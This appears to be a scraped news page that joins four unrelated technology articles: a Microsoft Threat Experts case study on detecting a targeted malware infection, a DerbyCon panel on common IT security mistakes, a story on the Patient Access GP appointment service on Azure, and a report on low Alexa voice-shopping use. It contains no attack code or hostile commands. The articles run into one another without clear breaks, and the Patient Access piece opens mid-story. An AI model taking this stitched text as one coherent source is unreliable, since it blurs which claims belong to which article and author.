By design, the Microsoft Threat Experts service has as many use cases as there are unique organizations with unique security scenarios and requirements. One particular case showed how an alert in Microsoft Defender ATP led to informed customer response, aided by a targeted attack notification that progressed to an experts on demand inquiry, resulting in the customer fully remediating the incident and improving their security posture.

In this case, Microsoft Defender ATP endpoint protection capabilities recognized a new malicious file on a single machine within an organization. The organization's security operations center (SOC) promptly investigated the alert and developed the suspicion that it might indicate a new campaign from an advanced adversary specifically targeting them.

Microsoft Threat Experts, who are constantly hunting on behalf of this customer, had independently spotted and investigated the malicious behaviors associated with the attack. With knowledge about the adversaries behind the attack and their motivation, Microsoft Threat Experts sent the organization a bespoke targeted attack notification, which provided additional information and context, including the fact that the file was related to an app that was targeted in a documented cyberattack.

To create a fully informed path to mitigation, experts pointed to information about the scope of compromise, relevant indicators of compromise, and a timeline of observed events, which showed that the file executed on the affected machine and proceeded to drop additional files. One of these files attempted to connect to a command-and-control server, which could have given the attackers direct access to the organization’s network and sensitive data. Microsoft Threat Experts recommended full investigation of the compromised machine, as well as the rest of the network for related indicators of attack.

Based on the targeted attack notification, the organization opened an experts on demand investigation, which allowed the SOC to have a line of communication and consultation with Microsoft Threat Experts. Microsoft Threat Experts were able to immediately confirm the attacker attribution the SOC had suspected. Using Microsoft Defender ATP’s rich optics and capabilities, coupled with intelligence on the threat actor, experts on demand validated that there were no signs of second-stage malware or further compromise within the organization. Since, over time, Microsoft Threat Experts had developed an understanding of this organization’s security posture, they were able to share that the initial malware infection was the result of a weak security control: allowing users to exercise unrestricted local administrator privilege.

Experts on demand in the current cybersecurity climate

On a daily basis, organizations have to fend off an onslaught of increasingly sophisticated attacks that present unique security challenges: supply chain attacks, highly targeted campaigns and hands-on-keyboard attacks. With Microsoft Threat Experts, customers can work with Microsoft to augment their security operations capabilities and increase confidence in investigating and responding to security incidents.

Now that experts on demand is generally available, Microsoft Defender ATP customers have an even richer way of tapping into Microsoft's security experts and getting access to the skills, experience, and intelligence necessary to face adversaries.

Experts on demand provides insights into attacks, technical guidance on next steps, and advice on risk and protection. Experts can be engaged directly from within the Windows Defender Security Center, so they are part of the existing security operations experience.

We are happy to bring experts on demand within reach of all Microsoft Defender ATP customers. Start your 90-day free trial via the Microsoft Defender Security Center today.

Learn more about Microsoft Defender ATP’s managed threat hunting service here: Announcing Microsoft Threat Experts.

Author: Microsoft News Center

DerbyCon panel discusses IT mistakes that need to stop

A panel of experts at DerbyCon discussed common IT mistakes that they don’t want to see happen anymore and offered some suggestions on how to avoid risks.

The talk broke down the IT mistakes the panelists thought needed to stop, ranging from basic security issues to more technical problems. The panelists included Lesley Carhart, principal threat analyst at Dragos Inc.; Chelle Clements, web content developer at Online Marketing and Publishing; April Wright, an application security architect; and Amanda Berlin, senior security architect at Blumira and CEO of Mental Health Hackers.

As the discussion went on, themes began to surface around education, communication and empowering users. Wright and Clements were advocates for not just better educating users, but finding ways to make that education more personal.

Wright focused on IT mistakes like oversharing on social media. She said oversharing can easily become a problem for enterprises, because all of that data can be used to spear-phish users and potentially gain access to a company network. 

“One thing that can be done to curb oversharing is to train users how to protect their families and themselves outside of work. Users need to understand what they’re doing and how it impacts others,” Wright said. “Learning to protect themselves will make them more aware and better advocates. If security isn’t personal to them, they won’t care, because they don’t care about your data; they care about their data.”

Clements agreed and cautioned users against oversharing on social media, as it “eventually comes back to bite them in the ass.”

She also added that basic security concerns are still an issue, including using bad passwords, visiting shady websites, opening email messages from unknown senders and clicking links within those messages.

Clements said finding better training methods is a must. She described security training that she set up over the years, including one-on-one sessions when possible, because “you may need a unique language to explain something. The way you explain something to a physicist will be different than a chemist.”

Wright added that there needs to be better training around the limitations of security products, because IT mistakes can come from users trusting products too much.

“A lot of people feel like they’re more protected than they really are. We [need to] teach them about the failings of what the technology is that’s designed to protect them,” Wright said. “The blinky boxes are great, but it’s really education that’s going to solve the problems of the users. It’s not putting in a bunch of things to protect them, like putting them in a rubber room. It’s teaching them that things are sharp and things are hot, and they shouldn’t touch them.”

Berlin added that these types of IT mistakes can happen with administrators, as well, who might not understand that a security product is “not a magic solution that you can just install and you’re done,” including not configuring products after installing them.

“It’s an ongoing process that you have to keep revisiting. If you have an MSSP [managed security services provider] or you’re doing it internally, that’s going to be someone’s full-time job. It’s something that you need to treat less of a project and more of an ongoing thing,” Berlin said. “Work closer with your security vendors and all your other vendors. They’re usually there to help you, and you are paying them. Keep them accountable. Actually work through the implementation, and make sure they’re continuously working on it and they don’t install it and forget it, as well.”

Beyond educating users, Carhart said IT staff needs to stop expecting security products to be perfect, because they are all just deterrents and, “ultimately, everybody is going to be vulnerable to phishing or a breach.”

“If you have a house, you put a door on that house, and that deters neighborhood kids from walking in. You put on a deadbolt, and that deters the casual thief. Then, maybe you put in an alarm system, and that deters the more dedicated [thieves]. But if someone is paying $10,000 to hire a hit man to kill you? Guess what that hit man is doing? He’s coming in and killing you. You’re going to die. I’m sorry,” Carhart said. “Security is like that. We add defense in depth, and we deter and deter, but people have to understand that you have to plan for that worst-case scenario.”

Empowering users

Carhart noted that many IT mistakes stem from users not feeling empowered to speak up, especially if they feel embarrassed after making a mistake. She said users need to be comfortable demanding better security and privacy from vendors, and be sure to speak up when the IT staff is asking for too much.

“We have all these tropes that we keep using over and over again, like, ‘Use a strong password, use a password manager,’ and stuff. And, sometimes, those are really tricky things to do,” Carhart said. “Have you ever tried to convert all of your passwords saved in a bunch of browsers to a password manager? That’s not an intuitive process. That’s really, really hard to do. So, I would like to see more end users tell their security people to go F themselves. Tell us when something is too hard.”

One reason users might not speak up, according to Wright, comes from social norms and users trying to be polite. This can lead to IT mistakes, because users aren’t willing to put themselves “in an uncomfortable situation” and ask questions regarding potential security incidents. 

“This is a very hard thing to fix. It’s a culture thing; it’s an education thing; it’s a training thing, where you have to make sure that people understand they have the power to make or break the security controls that you have in place,” Wright said.

She added later that this can happen because users don't listen to their instincts. "If you don't listen to that voice [in your head] … you might notice things, but you're not going to pay attention to them."

Carhart added that even those with no security expertise should feel empowered to speak up and “realize that security isn’t magic. It’s something they can learn about.”

“I’m in industrial control systems now, and I’m dealing with a lot of eclectic legacy systems from the ’70s and ’80s. The people who know those systems the best are the guys or girls who have been there for 30 years. They might not know everything about security, but they could be very interested in it,” Carhart said. “I’d like, as a solution to that problem, to have users remember that they can contribute to security, and there are elements of knowledge that they bring to the table that we don’t have.”

Berlin noted that communication issues can also be a problem with red and blue teams, especially if those teams aren’t paired up.

“It’s a really big problem when it comes to doing defensive stuff, because we can’t fix what we don’t know is broken, especially when you’re a contractor or an MSSP, because you don’t know the networks and everything that they have internally, as well as the red teamer that broke in or their internal team,” Berlin said.


No one likes waiting on the phone for a GP appointment. So why do we still do it?

The team behind the services are experts in healthcare, as they also run Patient.Info, one of the most popular medical websites in the UK. More than 100 million people logged on to the site in 2018 to read articles about healthcare, check symptoms and learn to live a healthier life, and more than 60% of GPs in England have access to it.

They also produce a newsletter that’s sent to 750,000 subscribers and around 2,000 leaflets on health conditions and 850 on medicines.

People can access Patient.Info 24 hours a day, seven days a week. It's the same for Patient Access, but web traffic spikes every morning when people want to book appointments to see their GP. To handle that demand, Patient Access runs on Microsoft's Azure cloud platform. As well as being reliable and stable, the platform protects all patient data with a high level of security – Microsoft employs more than 3,500 dedicated cybersecurity professionals to help protect, detect and respond to threats, while segregated networks and integrated security controls add to the peace of mind.

“About 62% of GP practices use Patient Access,” says Sarah Jarvis MBE, the Clinical Director behind the service. “They’re using it to manage their services, manage appointments, take in repeat medications, consolidate a patient’s personal health record and even conduct video consultations.

“Just imagine your GP being able to conduct video consultations. If you’re aged 20 to 39 you might not want or need to have a relationship with a GP because you don’t need that continuity of care.

“But imagine you are elderly and housebound, and a district nurse visits you. They phone your GP and say: ‘Could you come and visit this patient’, but the GP is snowed under and can’t get there for a couple of hours. The district nurse is also very busy and must visit someone else.

“Now, with Patient Access, a Duty Doctor can look at someone’s medical record and do a video consultation in five minutes. If the patient needs to be referred, the GP can do it there and then from inside the system. The possibilities are endless, and older people, especially, have so much to gain from this.”

Author: Microsoft News Center

Report on Alexa-enabled devices puts spotlight on voice commerce

Will voice commerce catch on? It hasn’t yet, according to a new report by The Information, but experts said that won’t slow the growth of voice computing.

According to the report, which cites two people briefed on Amazon’s internal figures, only about 2% of the people who own Alexa-enabled devices — mainly Amazon’s Echo line of speakers — have made a purchase with their voices so far in 2018. Of the people who did buy something using Alexa voice shopping, about 90% didn’t try it again, the report states.

An Amazon spokesperson disputed the figures presented in The Information, but previous reports also conveyed less-than-stellar numbers when it comes to consumers using smart speaker devices for voice commerce. The Information’s numbers also jibe with a report released last fall by technology consulting firm Activate that found the majority of smart speaker owners use their devices for relatively simple functions like playing music, getting the weather or setting alarms. In fact, shopping wasn’t even on the list of things users said they do with their devices.


“I’m not surprised,” said Zeus Kerravala, founder and principal analyst at ZK Research. “I think voice has a lot of potential; I just think there’s a lot of trust issues around it right now. It’s not dissimilar to what happened with online purchasing. A lot of people were cautious with that until they tried it a couple of times and they gained some confidence in it.”


Beyond that, using voice alone to shop is simply not practical, said Julie Ask, principal analyst at Forrester.

“It’s simply too hard [to purchase things via voice only] beyond replenishment of simple goods,” Ask said. “There are easier ways to buy. It’s hard to browse, you can’t see images and you can’t realistically listen to product descriptions — and who would want to?”

She added that although Amazon is number one in market share, retailers are wary of partnering with the company, which could also have played a role in the lackluster figures on shopping via Alexa-enabled devices.

Voice in the enterprise

Given all that, should the enterprise back off from pursuing voice computing? Not at all, said Werner Goertz, research director at Gartner. Just because “mom and pop” are not buying goods through Alexa-enabled devices today doesn’t say much about the value of the voice AI category as a whole — or about consumer shopping habits going forward. Voice commerce will undoubtedly evolve, he said, and, in any case, people’s current disinclination to use Alexa-enabled devices for shopping shouldn’t dissuade CIOs from investing in voice computing.


Goertz said there will be an organic growth in e-commerce capabilities and usage, with the hospitality industry, restaurants and chain stores already developing proofs of concepts and use cases that incorporate different transactions using voice AI technology.

An example Goertz gave was Amazon partnering with Marriott International to start bringing Amazon Echo smart speakers into hotels as part of the tech giant’s Alexa for Hospitality initiative. Hotel guests will be able to use the Alexa-enabled devices to order room service, call for more towels, order entertainment and more.

“Companies are definitely trying to reinvent brand experience and they’re doing that with smart speakers and with multimodal voice interactions as well,” Goertz said.

By multimodal voice interactions, Goertz means voice assistants with screens, like Amazon’s Echo Show. He said these kinds of devices lend themselves better to functions like voice commerce — and alleviate some of the issues with voice-only shopping raised by Forrester’s Ask.

Gartner analyst Ranjit Atwal agreed that multimodal voice devices using voice, video, chat and screens will eventually allow for more frequent and complex purchases — and a more integrated customer experience — but admitted there’s still “a long way to go” for voice commerce.

As Kerravala said, “I think there will be a day when voice is the dominant interface … we just need to take baby steps in getting there.”

What’s the takeaway for CIOs, according to Ask?

“CIOs should use [voice technology] and pilot it, but in scenarios that make sense — easy information retrieval, control, et cetera,” she said. “Don’t stretch it beyond what it does easily.”